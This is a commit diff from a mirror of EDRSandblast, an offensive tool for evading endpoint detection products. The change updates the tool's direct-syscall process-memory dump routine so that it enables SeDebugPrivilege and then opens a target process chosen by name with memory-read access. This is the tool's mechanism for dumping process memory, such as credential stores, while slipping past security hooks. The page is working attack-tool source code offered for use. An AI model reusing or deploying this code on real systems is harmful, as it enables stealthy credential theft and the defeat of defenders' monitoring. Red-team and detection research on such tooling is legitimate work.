Mirrors/wavestone-cdt-edrsandblast
1
0
Fork 0
mirror of https://github.com/wavestone-cdt/EDRSandblast.git synced 2026-06-08 16:37:12 +00:00
Code Issues Packages Projects Releases Wiki Activity

fix syscall dump method, enable sedebugprivilege

Browse Source
This commit is contained in:
NK
2023-11-02 22:38:10 -05:00
committed by Maxime Meignan
parent fa8f55ad83
commit 77953c60bd
2 changed files with 15 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files
EDRSandblast/Includes/SyscallProcessUtils.h
+3 -1
View File
@@ -10,4 +10,6 @@ PUNICODE_STRING SandGetProcessImage(HANDLE hProcess);
DWORD SandGetProcessFilename(PUNICODE_STRING ProcessImageUnicodeStr, TCHAR* ImageFileName, DWORD nSize);
DWORD SandFindProcessPidByName(TCHAR* targetProcessName, DWORD* pPid);
DWORD SandFindProcessPidByName(TCHAR* targetProcessName, DWORD* pPid);
BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege);
EDRSandblast/UserlandBypass/ProcessDumpDirectSyscalls.c
+12 -1
View File
@@ -402,7 +402,18 @@ DWORD SandMiniDumpWriteDump(TCHAR* targetProcessName, WCHAR* dumpFilePath) {
InitializeObjectAttributes(&ObjectAttributesProcess, NULL, 0, NULL, NULL);
CLIENT_ID clientId = { 0 };
clientId.ProcessId = UlongToHandle(targetProcessPID);
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
_tprintf_or_not(TEXT("[-] Unable to open process token. Error : %lu\n"), GetLastError());
goto cleanup;
}
if (SetPrivilege(hToken, L"SeDebugPrivilege", TRUE)) {
_tprintf_or_not(TEXT("[+] SeDebugPrivilege enabled\n"));
}
else {
_tprintf_or_not(TEXT("[-] Unable to enable SeDebugPrivilege\n"));
goto cleanup;
}
status = NtOpenProcess(&htargetProcess, PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, &ObjectAttributesProcess, &clientId);
if (status == STATUS_ACCESS_DENIED) {
_tprintf_or_not(TEXT("[-] Syscall process dump failed: access denied error while trying to get an handle on the target process (NtOpenProcesserror 0x%x).\n"), status);